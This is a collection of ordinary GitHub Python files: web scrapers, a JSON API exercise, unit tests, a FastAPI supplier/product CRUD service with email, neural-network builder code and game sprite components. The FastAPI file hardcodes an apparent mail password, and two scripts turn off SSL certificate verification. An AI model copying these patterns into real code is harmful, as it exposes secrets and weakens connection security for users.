'https://ru.wikipedia.org/wiki/%D0%9A%D0%B0%D1%82%D0%B5%D0%B3%D0%BE%D1%80%D0%B8%D1%8F:%D0%96%D0%B8%D0%B2%D0%BE%D1%82%D0%BD%D1%8B%D0%B5_%D0%BF%D0%BE_%D0%B0%D0%BB%D1%84%D0%B0%D0%B2%D0%B8%D1%82%D1%83'\n\ndef parse_sql():\n global ANIMALS\n cur.execute('SELECT count(*) FROM Animals')\n number_of_animals = cur.fetchone()[0]\n for id in range(1, number_of_animals + 1):\n cur.execute('SELECT name FROM Animals WHERE id = ? ', (id, ))\n row = cur.fetchone()[0]\n ANIMALS[row[0]] = ANIMALS.get(row[0], 0) + 1\n\n\n\ndef parse_wiki(url_link):\n fhand = urllib.urlopen(url_link, context = ctx).read()\n soup = BeautifulSoup(fhand, 'html.parser')\n tags = soup('a')\n return tags\n\n\ndef parse():\n while True:\n global URL\n tags = parse_wiki(URL)\n if 'Aaaaba' in str(tags): break\n for tag in tags:\n if 'Следующая страница' in str(tag): URL = 'https://ru.wikipedia.org/' + str(tag.get('href'))\n if tag.get('title', None) == None: continue\n if tag.get('title') == 'Служебная:Категории': break\n if ':' in str(tag.get('title')): continue\n cur.execute('''INSERT OR IGNORE INTO Animals (name) VALUES ( ? 
)''', ( tag.get('title'), ) )\n conn.commit()\n parse_sql()\n\n\nparse()\ncur.close()\nprint(ANIMALS.items())","repo_name":"Amaym0n/greencode","sub_path":"pet_projects/parse_wiki_animals/animals.py","file_name":"animals.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17317479375","text":"#\n# Title: Extracting Data from JSON API\n# Author: Claudio Asangong\n#\n# In this assignment you will write a Python program that prompts for a URL,\n# read the JSON data from that URL using urllib and then parse and extract the\n# comment counts from the JSON data, compute the sum of the numbers in the file\n#\n# We provide two files for this assignment. One is a sample file where we give\n# you the sum for your testing and the other is the actual data you need to\n# process for the assignment.\n#\n# Sample data: http://py4e-data.dr-chuck.net/comments_42.json (Sum=2553)\n# Actual data: http://py4e-data.dr-chuck.net/comments_174563.json\n# (Sum ends with 40)\n#\n# Concepts: JSON, urllib\n\nimport urllib.request\nimport json\nimport ssl\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nwhile True:\n url = input(\"Enter data url: \")\n if len(url) < 1:\n break\n print('Retrieving', url)\n urlhandler = urllib.request.urlopen(url, context=ctx)\n urldata = urlhandler.read().decode()\n print('Retrieved', len(urldata), 'characters')\n\n # parse the json data into python object (deserialize)\n try:\n js = json.loads(urldata)\n except Exception:\n print('==== Failure To Retrieve ====')\n print(urldata)\n continue\n\n print('Count:', len(js['comments']))\n total = 0\n for d in js['comments']:\n total += d['count']\n print('Sum:', total)\n","repo_name":"aclaudio123/python-for-everybody","sub_path":"Crs3_python_access_web_data/json_comments_count.py","file_name":"json_comments_count.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22900235524","text":"#!/usr/bin/env python\nfrom __future__ import absolute_import, print_function, unicode_literals\n\nimport os\nimport sys\nfrom io import StringIO\n\n# Allow interactive execution from CLI, cd tests; ./test_cli.py\nif __package__ is None:\n sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n\nimport contextlib\nimport unittest\n\nfrom ksconf.command import get_entrypoints\nfrom ksconf.consts import EXIT_CODE_NO_SUCH_FILE, EXIT_CODE_SUCCESS, EXIT_CODE_USER_QUIT\nfrom tests.cli_helper import FakeStdin, TestWorkDir, ksconf_cli\n\n\nclass CliSimpleTestCase(unittest.TestCase):\n \"\"\" Test some very simple CLI features. 
\"\"\"\n\n def test_help(self):\n out = ksconf_cli(\"--help\")\n with ksconf_cli:\n self.assertIn(\"Ksconf Splunk CONFig tool\", out.stdout)\n self.assertIn(\"usage: \", out.stdout)\n self.assertEqual(out.returncode, EXIT_CODE_SUCCESS)\n\n def test_conffileproxy_invalid_arg(self):\n bad_conf = \"\"\"\n [dangling stanza\n attr = 1\n bad file = very true\"\"\"\n twd = TestWorkDir()\n badfile = twd.write_file(\"bad_conf.conf\", bad_conf)\n with ksconf_cli:\n\n # A command that uses ConfFileType() with mode=\"load\"\n base_cmd = [\"rest-export\"]\n\n ko = ksconf_cli(*base_cmd + [twd.get_path(\"a_non_existent_file.conf\")])\n self.assertIn(ko.returncode, (EXIT_CODE_USER_QUIT, EXIT_CODE_NO_SUCH_FILE))\n self.assertRegex(ko.stderr, r\".*\\b(can't open '[^']+\\.conf'|invalid ConfFileType).*\")\n\n ko = ksconf_cli(*base_cmd + [badfile])\n self.assertIn(ko.returncode, (EXIT_CODE_USER_QUIT, EXIT_CODE_NO_SUCH_FILE))\n self.assertRegex(ko.stderr, \".*(failed to parse|invalid ConfFileType).*\")\n\n with FakeStdin(bad_conf):\n ko = ksconf_cli(*base_cmd + [\"-\"])\n self.assertIn(ko.returncode, (EXIT_CODE_USER_QUIT, EXIT_CODE_NO_SUCH_FILE))\n self.assertRegex(ko.stderr, \".*(failed to parse|invalid ConfFileType).*\")\n\n def test_get_named_entrypoint(self):\n eps = get_entrypoints(\"ksconf_cmd\", \"diff\")\n self.assertEqual(len(eps), 1)\n assert eps[\"diff\"]\n\n def test_entrypoint_debug(self):\n from ksconf.setup_entrypoints import debug\n stdout = StringIO()\n with contextlib.redirect_stdout(stdout):\n debug()\n assert \"Builtin entrypoints\" in stdout.getvalue()\n\n\nif __name__ == '__main__': # pragma: no cover\n unittest.main()\n","repo_name":"Kintyre/ksconf","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"4976402375","text":"import pytest\nimport torch\n\nfrom src.models.model import MyAwesomeModel\n\n\nclass TestModel:\n # mark.parametrize enables parametrization of arguments for a test function\n # checks if certain input has the correct shape\n @pytest.mark.parametrize(\n \"test_input,expected\",\n [\n (torch.randn(1, 1, 2, 28), ValueError),\n (torch.randn(64, 1, 28, 2), ValueError),\n (torch.randn(100, 3, 28, 28), ValueError),\n ],\n )\n def test_model_input_shape(self, test_input, expected):\n model = MyAwesomeModel(0.25, 0.5)\n model.train()\n # if the input has the wrong shape, the model should raise a ValueError\n with pytest.raises(\n expected, match=\"Expected each x sample to have shape 1,28,28\"\n ):\n model.forward(test_input)\n\n # checks if the output shape is correct\n @pytest.mark.parametrize(\n \"test_input,expected\",\n [\n (torch.randn(1, 1, 28, 28), (1, 10)),\n (torch.randn(64, 1, 28, 28), (64, 10)),\n (torch.randn(100, 1, 28, 28), (100, 10)),\n ],\n )\n def test_model_output(self, test_input, expected):\n model = MyAwesomeModel(0.25, 0.5)\n output = model(test_input)\n assert output.shape == expected\n","repo_name":"abzink/MLops-2023","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25620250634","text":"from enum import Enum\nfrom typing import List, Dict\n\nfrom src.ai.ai_data_and_info.ai_awards.ai_awards_definer import AiAwardsDefiner\nfrom src.ai.ai_data_and_info.ai_info import AiInfo\nfrom 
src.ai.neural_network.technology_adapter.builder.command_cost_definer_layer_builder import \\\n CommandCostDefinerLayerBuilder\nfrom src.ai.neural_network.technology_adapter.builder.input_param_cost_definer_layer_builder import \\\n InputParamCostDefinerLayerBuilder\nfrom src.ai.neural_network.technology_adapter.error_function import ErrorFunction\nfrom src.ai.neural_network.technology_adapter.network_adapter import NetworkAdapter\nfrom src.ai.neural_network.technology_adapter.network_layer import NetworkLayer, NetworkLayers\nfrom src.ai.neural_network.technology_adapter.network_technology_adapter_builder import NetworkTechnologyAdapterBuilder\nfrom src.ai.neural_network.technology_adapter.optimizer import Optimizer\nfrom src.ai.neural_network.technology_adapter.tensorflow.builder.command_cost_definer_layer_builder import \\\n TensorflowCommandCostDefinerLayerBuilder\nfrom src.ai.neural_network.technology_adapter.tensorflow.builder.input_param_cost_definer_layer_builder import \\\n TensorflowInputParamCostDefinerLayerBuilder\nfrom src.ai.neural_network.technology_adapter.tensorflow.scout_network_adapter import ScoutNetworkAdapter\nfrom src.ai.neural_network.technology_adapter.tensorflow.tensorflow_network_adapter_builder import \\\n TensorflowNetworkAdapterBuilder\n\n\nclass InputLayerNames(Enum):\n unit_observation: str = \"unit_observation\"\n person_unit_params: str = \"person_unit_params\"\n sector_params: str = \"sector_params\"\n\n\nclass InputParamCostDefinerLayerNames(Enum):\n unit_observation: str = \"unit_observation__cost_definer\"\n person_unit_params: str = \"person_unit_params__cost_definer\"\n sector_params: str = \"sector_params__cost_definer\"\n\n\nclass CommandCostDefinerLayerNames(Enum):\n unit_observation: str = \"unit_observation__command_cost_definer\"\n person_unit_params: str = \"person_unit_params__command_cost_definer\"\n sector_params: str = \"sector_params__command_cost_definer\"\n\n\ncommand_cost_definer_layer_names: List[CommandCostDefinerLayerNames] = []\nfor name in CommandCostDefinerLayerNames:\n command_cost_definer_layer_names.append(name)\n\n\nclass CommandCostDefinerTensorNames(Enum):\n up: str = \"up_command_cost_definer\"\n up_right: str = \"up_right_command_cost_definer\"\n right: str = \"right_command_cost_definer\"\n down_right: str = \"down_right_command_cost_definer\"\n down: str = \"down_command_cost_definer\"\n down_left: str = \"down_left_command_cost_definer\"\n left: str = \"left_command_cost_definer\"\n up_left: str = \"up_left_command_cost_definer\"\n\n\nclass LengthDistanceTensorPrefix(Enum):\n min: str = \"min_distance\"\n max: str = \"max_distance\"\n\n\ncommand_cost_definer_tensor_names: List[str] = []\nfor prefix in LengthDistanceTensorPrefix:\n for name in CommandCostDefinerTensorNames:\n command_cost_definer_tensor_names.append(prefix.value + \"__\" + name.value)\n\n\nclass CommandCostDefinerTensorId(Enum):\n up: int = 0\n up_right: int = 1\n right: int = 2\n down_right: int = 3\n down: int = 4\n down_left: int = 5\n left: int = 6\n up_left: int = 7\n\n\nclass CommandDefinerLevel(Enum):\n command_cost_summation_layer: str = \"command_cost_summation_layer\"\n result: str = \"result_layer\"\n\n\nclass NetworkTechnologyAdapterDirector:\n def __init__(self):\n self._builder: NetworkTechnologyAdapterBuilder = TensorflowNetworkAdapterBuilder()\n self._input_param_cost_definer_builder: InputParamCostDefinerLayerBuilder \\\n = TensorflowInputParamCostDefinerLayerBuilder()\n self._command_cost_definer_builder: CommandCostDefinerLayerBuilder 
\\\n = TensorflowCommandCostDefinerLayerBuilder()\n\n def generate_scout_network_adapter(self,\n ai_info: AiInfo,\n ai_awards_definer: AiAwardsDefiner) -> NetworkAdapter:\n if ai_info.ai_type != \"neuron-network\":\n return NetworkAdapter()\n result: ScoutNetworkAdapter = self._builder.generate_scout_network_adapter(ai_info)\n\n # if result.exist_model():\n # error_function: ErrorFunction = self._builder.generate_error_function(ai_awards_definer)\n # optimizer: Optimizer = self._builder.generate_optimizer()\n # return self._builder.compile_model(result, error_function, optimizer)\n input_layers: Dict[str, NetworkLayers] = self._build_input_layers()\n result.set_input_layers(input_layers)\n\n input_param_cost_definer: NetworkLayers = self._build_input_param_cost_definer_layers(input_layers)\n result.set_input_param_cost_definer(input_param_cost_definer)\n\n command_cost_definer_layer: Dict[str, NetworkLayers] = self._build_command_cost_definer_layers(\n input_param_cost_definer)\n result.set_command_cost_definer(command_cost_definer_layer)\n\n command_definer_layer: NetworkLayer = self._build_command_definer_layers(command_cost_definer_layer)\n result.set_command_definer(command_definer_layer)\n\n output_layer: NetworkLayers = self._build_output_layer(command_definer_layer)\n result.set_output_layer(output_layer)\n\n error_function: ErrorFunction = self._builder.generate_error_function(ai_awards_definer)\n optimizer: Optimizer = self._builder.generate_optimizer()\n return self._builder.compile_model(result, error_function, optimizer)\n\n def _build_input_layers(self) -> Dict[str, NetworkLayers]:\n result: Dict[str, NetworkLayers] = {\n InputLayerNames.unit_observation.value: self._builder.generate_input_unit_observation_layer(),\n InputLayerNames.sector_params.value: self._builder.generate_input_sector_params_layer(),\n InputLayerNames.person_unit_params.value: self._builder.generate_input_person_unit_params_layer(),\n }\n return result\n\n def _build_input_param_cost_definer_layers(self, input_layers: Dict[str, NetworkLayers]) -> NetworkLayers:\n builder: InputParamCostDefinerLayerBuilder = self._input_param_cost_definer_builder\n result: NetworkLayers = {\n InputParamCostDefinerLayerNames.unit_observation.value:\n builder.generate_unit_observation_layer(\n input_layers\n ),\n InputParamCostDefinerLayerNames.sector_params.value:\n builder.generate_sector_params_layer(\n input_layers\n ),\n InputParamCostDefinerLayerNames.person_unit_params.value:\n builder.generate_person_unit_params_layer(\n input_layers\n ),\n }\n return result\n\n def _build_command_cost_definer_layers(self, input_layers: NetworkLayers) -> Dict[str, NetworkLayers]:\n builder: CommandCostDefinerLayerBuilder = self._command_cost_definer_builder\n result: Dict[str, NetworkLayers] = {\n CommandCostDefinerLayerNames.unit_observation.value:\n builder.generate_for_unit_observation_layer(\n input_layers\n ),\n CommandCostDefinerLayerNames.sector_params.value:\n builder.generate_for_sector_params_layer(\n input_layers\n ),\n CommandCostDefinerLayerNames.person_unit_params.value:\n builder.generate_for_person_unit_params_layer(\n input_layers\n ),\n }\n return result\n\n def _build_command_definer_layers(self, input_layers: Dict[str, NetworkLayers]) -> NetworkLayer:\n result: NetworkLayer = self._builder.generate_command_definer_layer(input_layers)\n return result\n\n def _build_output_layer(self, input_layer: NetworkLayer) -> NetworkLayers:\n result: NetworkLayers = self._builder.generate_output_layer(input_layer)\n return 
result\n","repo_name":"7kia/AIServer","sub_path":"src/ai/neural_network/technology_adapter/network_technology_adapter_director.py","file_name":"network_technology_adapter_director.py","file_ext":"py","file_size_in_byte":7998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"29490122119","text":"from fastapi import BackgroundTasks, FastAPI, UploadFile, File, Form\nfrom tortoise.contrib.fastapi import register_tortoise\nfrom models import (\n supplier_pydantic,\n supplier_pydanticIn,\n Supplier,\n product_pydantic,\n product_pydanticIn,\n Product,\n)\n\n# email\nfrom typing import List\nfrom fastapi_mail import ConnectionConfig, FastMail, MessageSchema, MessageType\nfrom pydantic import BaseModel, EmailStr\nfrom starlette.responses import JSONResponse\n\n# dotenv\nfrom dotenv import dotenv_values\n\n# credentials\ncrendentials = dotenv_values(\".env\")\n\n#addings cors headers\nfrom fastapi.middleware.cors import CORSMiddleware\n\n\n\napp = FastAPI()\n\n#adding cors urls\norigins = [\n 'http://localhost:3000'\n]\n\n#add middleware\napp.add_middleware(\n CORSMiddleware,\n allow_origins = origins,\n allow_credentials = True,\n allow_methods = [\"*\"],\n allow_headers = [\"*\"]\n)\n\n@app.get(\"/\")\ndef index():\n return {\"Msg \": \"Go to '/docs' for the API documentation\"}\n\n\n# CRUD functionalities for Supplier Model\n@app.post(\"/supplier\")\nasync def add_supplier(supplier_info: supplier_pydanticIn):\n supplier_obj = await Supplier.create(**supplier_info.dict(exclude_unset=True))\n response = await supplier_pydantic.from_tortoise_orm(supplier_obj)\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.get(\"/supplier\")\nasync def get_all_suppliers():\n response = await supplier_pydantic.from_queryset(Supplier.all())\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.get(\"/supplier/{supplier_id}\")\nasync def get_specific_supplier(supplier_id: int):\n response = await supplier_pydantic.from_queryset_single(\n Supplier.get(id=supplier_id)\n )\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.put(\"/supplier/{supplier_id}\")\nasync def update_supplier(supplier_id: int, update_info: supplier_pydanticIn):\n supplier = await Supplier.get(id=supplier_id)\n update_info = update_info.dict(exclude_unset=True)\n supplier.name = update_info[\"name\"]\n supplier.company = update_info[\"company\"]\n supplier.email = update_info[\"email\"]\n supplier.phone = update_info[\"phone\"]\n await supplier.save()\n response = await supplier_pydantic.from_tortoise_orm(supplier)\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.delete(\"/supplier/{supplier_id}\")\nasync def delete_supplier(supplier_id: int):\n supplier = await Supplier.filter(id=supplier_id).first()\n if supplier:\n await supplier.delete()\n return {\"status\": \"ok\"}\n else:\n return {\"status\": \"Supplier not found\"}\n\n\n# CRUD functionalities for Product Model\n\n\n@app.post(\"/product/{supplier_id}\")\nasync def add_product(supplier_id: int, products_details: product_pydanticIn):\n supplier = await Supplier.get(id=supplier_id)\n products_details = products_details.dict(exclude_unset=True)\n products_details[\"revenue\"] += (\n products_details[\"quantity_sold\"] * products_details[\"unit_price\"]\n )\n product_obj = await Product.create(**products_details, supplied_by=supplier)\n response = await product_pydantic.from_tortoise_orm(product_obj)\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.get(\"/product\")\nasync def 
get_all_products():\n response = await product_pydantic.from_queryset(Product.all())\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.get(\"/product/{product_id}\")\nasync def get_specific_product(product_id: int):\n response = await product_pydantic.from_queryset_single(Product.get(id=product_id))\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.put(\"/product/{product_id}\")\nasync def update_product(product_id: int, update_info: product_pydanticIn):\n product = await Product.get(id=product_id)\n update_info = update_info.dict(exclude_unset=True)\n product.name = update_info[\"name\"]\n product.quantity_in_stock = update_info[\"quantity_in_stock\"]\n product.quantity_sold = update_info[\"quantity_sold\"]\n product.unit_price = update_info[\"unit_price\"]\n product.revenue = (\n update_info[\"quantity_sold\"] * update_info[\"unit_price\"]\n ) + update_info[\"revenue\"]\n await product.save()\n response = await product_pydantic.from_tortoise_orm(product)\n return {\"status\": \"ok\", \"data\": response}\n\n\n@app.delete(\"/product/{product_id}\")\nasync def delete_product(product_id: int):\n product = await Product.filter(id=product_id).first()\n if product:\n await product.delete()\n return {\"status\": \"ok\"}\n else:\n return {\"status\": \"Product not found\"}\n\n\nclass EmailSchema(BaseModel):\n email: List[EmailStr]\n\n\nclass EmailContent(BaseModel):\n message: str\n subject: str\n\n\nconf = ConnectionConfig(\n MAIL_USERNAME=crendentials[\"EMAIL\"],\n MAIL_PASSWORD=\"jewfdebdknhajkgn\",\n MAIL_FROM=crendentials[\"EMAIL\"],\n MAIL_PORT=587,\n MAIL_SERVER=\"smtp.gmail.com\",\n MAIL_STARTTLS=True,\n MAIL_SSL_TLS=False,\n USE_CREDENTIALS=True,\n VALIDATE_CERTS=True,\n)\n\n\n@app.post(\"/email/{product_id}\")\nasync def send_email(product_id: int, content: EmailContent):\n product = await Product.get(id=product_id)\n supplier = await product.supplied_by\n suplier_email = [supplier.email]\n\n html = f\"\"\"\n
    Arthya Tech Solutions Private Ltd.
    \n
    \n

    {content.message}

    \n
    \n
    Best Regards
    \n
    Arthya Tech Solutions Private Ltd.
    \n \"\"\"\n\n message = MessageSchema(\n subject=content.subject, recipients=suplier_email, body=html, subtype=\"html\"\n )\n\n fm = FastMail(conf)\n await fm.send_message(message)\n return {\"status\": \"ok\"}\n\n\nregister_tortoise(\n app,\n db_url=\"sqlite://database.sqlite3\",\n modules={\"models\": [\"models\"]},\n generate_schemas=True,\n add_exception_handlers=True,\n)\n","repo_name":"amrutha-au/fastapi","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40868588083","text":"'''\nClase que se comporta como estructura para guardar un átomo, y los\ndiferentes atributos que tiene\n'''\nclass Atom:\n def __init__(self, name, electroNeg, doubleDots, singleDots):\n self.name = name\n self.quantity = 1\n self.electroNeg = electroNeg\n\n self.arrayAtoms = []\n self.Bonds = []\n\n self.doubleDots = doubleDots\n self.singleDots = singleDots\n\n #for drawing\n self.freeSpaces = 4","repo_name":"Jasc01/Lewis-Structure_Oxacids-and-Hidracids","sub_path":"Main Project/atom.py","file_name":"atom.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74760742313","text":"from urllib.parse import urljoin\n\n\ndef extract_kkr(soup, main_url):\n urls = []\n div_tag = soup.find('div', {'class': \"__blog-post-lists\"})\n ul_tag = div_tag.find('ul', {'class': None})\n li_tags = ul_tag.findAll('li')\n i = 0\n for li in li_tags:\n i += 1\n url = li.contents[3].get('href')\n urls.append(urljoin(main_url, url))\n\n return urls\n","repo_name":"ikhachatryan93/media_scrp","sub_path":"kkr_extractor.py","file_name":"kkr_extractor.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11466062257","text":"#!/usr/bin/env python\n\nimport shutil\nimport json\nimport subprocess\nimport os\nimport time\n\nimport atomsci.ddm.pipeline.parameter_parser as parse\nimport atomsci.ddm.pipeline.compare_models as cm\nimport glob\nfrom atomsci.ddm.utils import llnl_utils\n\ndef clean():\n \"\"\"\n Clean test files\n \"\"\"\n if \"hyperparam_search\" in os.listdir():\n shutil.rmtree(\"hyperparam_search\")\n\n if \"logs\" in os.listdir():\n shutil.rmtree(\"logs\")\n\n if \"run.sh\" in os.listdir():\n os.remove(\"run.sh\")\n\n if \"slurm_files\" in os.listdir():\n shutil.rmtree(\"slurm_files\")\n\n maestro_folders = glob.glob('Test_Maestro_*')\n for mf in maestro_folders:\n shutil.rmtree(mf)\n\ndef run_command(command):\n \"\"\"Runs the command and returns string\n\n Args:\n command (list): list of strings e.g. ['wc', '-l']\n\n Returns:\n str: output of the command\n \"\"\"\n p = subprocess.Popen(command, stdout=subprocess.PIPE)\n out = p.stdout.read().decode(\"utf-8\")\n\n return out\n\ndef wait_to_finish(maestro_run_command, max_time=600):\n \"\"\" Run hyperparam search and return pref_df\n\n Given parased parameter namespace build the hyperparam search command and\n wait for training to complete. Once training is complete, retrun the perf_df.\n This function repeatedly calls get_filesystem_perf_results until it sees\n at least the number of jobs generated by pparams.\n\n Args:\n maestro_run_command (str): Command to start maestro run.\n\n max_type (int): Max wait time in seconds. Default 600. -1 is unlimited\n wait time.\n\n Returns:\n bool: Returns True on completetion. 
\n\n \"\"\"\n out = run_command(maestro_run_command.split(' '))\n\n maestro_folders = glob.glob('Test_Maestro*')\n # We assert here that there should only be one maestro folder.\n # something is wrong with the test otherwise\n assert len(maestro_folders) == 1\n maestro_folder = maestro_folders[0]\n\n print('folder created')\n\n # make sure that there's a status file\n status_file = os.path.join(maestro_folder, 'status.csv')\n \n # wait for the file to be available\n while not os.path.exists(status_file):\n time.sleep(2)\n\n assert os.path.exists(status_file)\n\n print('status found')\n\n # check how many jobs got started\n out = run_command(['wc', '-l', status_file])\n num_jobs = int(out.split(' ')[0]) # out expected to look like \"2 Test_Maestro...\"\n\n num_completed = 0\n time_waited = 0\n wait_interval = 30\n print(\"Waiting %d jobs to finish. Checks every 30 seconds\" % num_jobs)\n while (num_completed < num_jobs) and ((max_time == -1) or (time_waited < max_time)):\n # wait until the training jobs have finished\n time.sleep(wait_interval) # check for results every 30 seconds\n time_waited += wait_interval\n finished_grep = run_command(['grep', '-c', 'FINISHED', status_file])\n try:\n num_completed = int(finished_grep)\n except ValueError:\n num_completed = 0\n\n failed_grep = run_command(['grep', '-c', 'FAILED', status_file])\n try:\n num_failed = int(failed_grep)\n except ValueError:\n num_failed = 0\n\n print(f'{num_completed} jobs finished {num_failed} jobs failed')\n assert num_failed == 0\n\n # see if you timed out\n assert time_waited < max_time\n\n return True\n\ndef test():\n \"\"\"\n Test full model pipeline: Curate data, fit model, and predict property for new compounds\n \"\"\"\n\n # Clean\n # -----\n clean()\n\n if not llnl_utils.is_lc_system():\n assert True\n return\n \n # Run ECFP NN hyperparam search\n # ------------\n json_file = \"nn_ecfp.json\"\n with open(json_file, \"r\") as f:\n hp_params = json.load(f)\n pparams = parse.wrapper(hp_params)\n\n print('launch maestro')\n _ = wait_to_finish(f\"maestro run -y -p custom_gen.py run_nn_ecfp.yaml\", max_time=2*60*60) # wait 2 hours.\n\n result_df = cm.get_filesystem_perf_results(pparams.result_dir, pparams.prediction_type)\n assert not result_df is None # Timed out\n assert max(result_df.loc[:,result_df.columns.str.contains(\"test_r2_score\")].values) > 0.6 # should do at least this well. 
I saw values like 0.687\n \n print('waiting for maestro to finish')\n time.sleep(60)\n\n # Clean\n # -----\n clean()\n\nif __name__ == '__main__':\n test()\n","repo_name":"ATOMScience-org/AMPL","sub_path":"atomsci/ddm/test/integrative/maestro/test_maestro.py","file_name":"test_maestro.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"72"} +{"seq_id":"43908917548","text":"def main(s: str):\n longest = \"\"\n tempLongest = \"\"\n stringIndex = 0\n\n while len(s) > 2 * len(longest):\n if (stringIndex >= len(s)):\n longest = tempLongest\n break\n\n if stringInculdes(tempLongest, s[stringIndex]):\n if len(tempLongest) > len(longest):\n longest = tempLongest\n tempLongest = \"\"\n stringIndex = 0\n s = s[1:]\n else:\n tempLongest += s[stringIndex]\n stringIndex += 1\n return len(longest)\n\n\ndef stringInculdes(string: str, char: str):\n for i in string:\n if char == i:\n return True\n return False\n","repo_name":"Cherifi-Houdaifa/ma-leetcode","sub_path":"leetcode_3.py","file_name":"leetcode_3.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30841508172","text":"from .BasicComponents import *\nfrom .locals import *\n\nfrom os.path import join as j_path\n\nclass StateComponent(StatesComponent, VelocityComponent):\n\n\tdef __init__(self):\n\t\tsuper(StateComponent, self).__init__()\n\t\tself.state = ShStates.MOVE\n\n\t\t# Create sensor-rects. Their values aren't definitive - they're updated in the update-method.\n\t\t# Sensor-rects are rects that \"sense\" if there is an edge, and if there is, they turn.\n\t\tself.sensor_rect_r = pygame.Rect(1, 1, 10, 10)\n\t\tself.sensor_rect_l = pygame.Rect(1, 1, 10, 10)\n\n\t\tself.colliding_mats = [\"solid\", \"soft-break\", \"hard-break\", \"shot-break\", \"fire-break\"]\n\t\tself.state_stack = [None for i in range(5)]\n\n\tdef update(self, game_actor, engine):\n\t\t# Update sensor-rects\n\t\tself.sensor_rect_r.topleft = game_actor.rect.bottomright\n\t\tself.sensor_rect_l.topright = game_actor.rect.bottomleft\n\n\t\tif self.state == ShStates.MOVE:\n\t\t\tif self.look_direction == LEFT:\n\t\t\t\tif engine.world.get_colliding_rect(Layers.main, self.colliding_mats, self.sensor_rect_l) is None:\n\t\t\t\t\tself.state = ShStates.TURN\n\t\t\telif self.look_direction == RIGHT:\n\t\t\t\tif engine.world.get_colliding_rect(Layers.main, self.colliding_mats, self.sensor_rect_r) is None:\n\t\t\t\t\tself.state = ShStates.TURN\n\n\t\t\tif RIGHT in self.colliding_sides or LEFT in self.colliding_sides:\n\t\t\t\tself.state = ShStates.TURN\n\t\t\telif not BOTTOM in self.colliding_sides:\n\t\t\t\tself.state = ShStates.STAY\n\n\t\telif self.state == ShStates.STAY:\n\t\t\tif BOTTOM in self.colliding_sides:\n\t\t\t\tself.state = ShStates.MOVE\n\n\t\tself.state_stack.pop(0)\n\t\tself.state_stack.append(self.state)\n\n\t\tgame_actor.send_message(MSGN.STATE, self.state)\n\t\tgame_actor.send_message(MSGN.STATESTACK, self.state_stack)\n\t\tgame_actor.send_message(MSGN.LOOKDIRECTION, self.look_direction)\n\n\nclass LookComponent(StatesComponent):\n\tdef __init__(self):\n\t\tsuper(LookComponent, self).__init__()\n\n\t\t# Initialize all Animation objects:\n\t\tself.animations = {}\n\t\twalk_r_imgs = split_tiled_image(pygame.image.load(j_path(\"images\", \"spearhead\", \"ANI_walk_r.png\")).convert_alpha(), (24, 16))\n\t\tself.animations[\"walk_right\"] = Animation(walk_r_imgs, [(2, 15), (0, 15), 
(1, 15), (0, 15)])\n\t\tself.animations[\"walk_left\"] = self.animations[\"walk_right\"].make_x_mirror()\n\n\t\tself.animations[\"stand_right\"] = Animation(walk_r_imgs, [0, 600])\n\t\tself.animations[\"stand_left\"] = self.animations[\"stand_right\"].make_x_mirror()\n\n\t\tturn_imgs = split_tiled_image(pygame.image.load(j_path(\"images\", \"spearhead\", \"ANI_turn_l.png\")).convert_alpha(), (24, 16))\n\t\tself.animations[\"turn_left\"] = Animation(turn_imgs, [(0,8), (1, 4), (0, 8), (1, 4), (0, 15), (1, 2), (0, 8), (2, 8), (3, 8), (4, 8), (5, 30), (5, 1)])\n\t\tself.animations[\"turn_right\"] = self.animations[\"turn_left\"].make_x_mirror()\n\n\t\t# Save the current animation\n\t\tself.current_animation = self.animations[\"stand_right\"]\n\t\t# Save the last animation to check if a new animation has started:\n\t\tself.current_animation_name = \"stand_right\"\n\t\t# Play the current animation\n\t\tself.current_animation.play()\n\n\tdef receive_message(self, name, value):\n\t\tsuper(LookComponent, self).receive_message(name, value)\n\n\tdef update(self, game_actor, engine):\n\t\tif self.state == ShStates.MOVE:\n\t\t\tif self.look_direction == RIGHT:\n\t\t\t\tself.play_animation(\"walk_right\")\n\t\t\telif self.look_direction == LEFT:\n\t\t\t\tself.play_animation(\"walk_left\")\n\t\telif self.state == ShStates.STAY:\n\t\t\tif self.look_direction == RIGHT:\n\t\t\t\tself.play_animation(\"stand_right\")\n\t\t\telif self.look_direction == LEFT:\n\t\t\t\tself.play_animation(\"stand_left\")\n\t\telif self.state == ShStates.TURN:\n\t\t\tif self.look_direction == LEFT:\n\t\t\t\tself.play_animation(\"turn_right\")\n\t\t\telif self.look_direction == 